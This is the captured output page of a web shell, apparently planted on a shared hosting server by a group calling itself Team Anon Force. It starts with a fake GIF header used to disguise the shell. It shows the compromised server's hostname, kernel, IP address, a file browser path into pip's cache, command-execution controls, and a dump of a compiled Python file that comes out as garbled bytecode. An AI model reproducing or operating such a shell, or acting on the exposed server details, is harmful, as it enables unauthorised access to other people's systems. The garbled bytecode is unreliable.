GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux server326.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
67.223.118.122
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
pip
/
_internal
/
utils
/
__pycache__
[ HOME ]
Exec
Submit
appdirs.cpython-38.pyc
U ʗRe� � @ s| d Z ddlZddlZddlmZ ddlmZ eed�dd�Z dee ed �d d�Zdee ed �dd �Zeee d�dd�Z dS )z� This code wraps the vendored appdirs module to so the return values are compatible for the current pip code base. The intention is to rewrite current usages gradually, keeping the tests pass, and eventually drop this after all usages are changed. � N)�List)�platformdirs)�appname�returnc C s t j| dd�S )NF)� appauthor)�_appdirs�user_cache_dir)r � r ��/builddir/build/BUILDROOT/alt-python38-pip-22.2.1-2.el8.x86_64/opt/alt/python38/lib/python3.8/site-packages/pip/_internal/utils/appdirs.pyr s r T)r �roamingr c C sB t j| d|d�}tj�|�r |S d}| r6tj�|| �}tj�|�S )NF�r r z ~/.config/)r � user_data_dir�os�path�isdir�join� expanduser)r r r �linux_like_pathr r r �_macos_user_config_dir s r c C s$ t jdkrt| |�S tj| d|d�S )N�darwinFr )�sys�platformr r �user_config_dir)r r r r r r "